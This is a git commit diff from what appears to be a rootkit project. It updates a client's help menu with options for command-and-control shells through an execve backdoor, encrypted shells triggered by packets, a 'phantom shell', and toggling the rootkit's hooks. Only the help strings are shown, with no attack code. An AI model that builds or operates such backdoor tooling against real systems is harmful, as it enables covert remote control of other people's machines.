Updated some files for eveything to work now that it is all together. Execve hijacker and clients in particular

This commit is contained in:
h3xduck
2022-05-15 20:47:58 -04:00
parent 4a292f0f7a
commit 78b3132687
57 changed files with 15420 additions and 15487 deletions

View File

@@ -42,7 +42,22 @@ void print_help_dialog(const char* arg){
char* desc = "Send a secret message to IP";
printf("\t%-40s %-50s\n\n", line, desc);
line = "-c IP";
desc = "Activate direct command & control shell with IP";
desc = "Activate C&C shell with IP - Using execve backdoor";
printf("\t%-40s %-50s\n\n", line, desc);
line = "-e IP";
desc = "Activate encrypted C&C shell with IP - with v1 trigger";
printf("\t%-40s %-50s\n\n", line, desc);
line = "-s IP";
desc = "Activate encrypted C&C shell with IP - with multi-packet trigger";
printf("\t%-40s %-50s\n\n", line, desc);
line = "-p IP";
desc = "Launch a phantom shell - with v1 trigger";
printf("\t%-40s %-50s\n\n", line, desc);
line = "-a IP";
desc = "Activate all of rootkit's hooks";
printf("\t%-40s %-50s\n\n", line, desc);
line = "-u IP";
desc = "Deactivate all of rootkit's hooks";
printf("\t%-40s %-50s\n\n", line, desc);
line = "-h";
desc = "Print this help";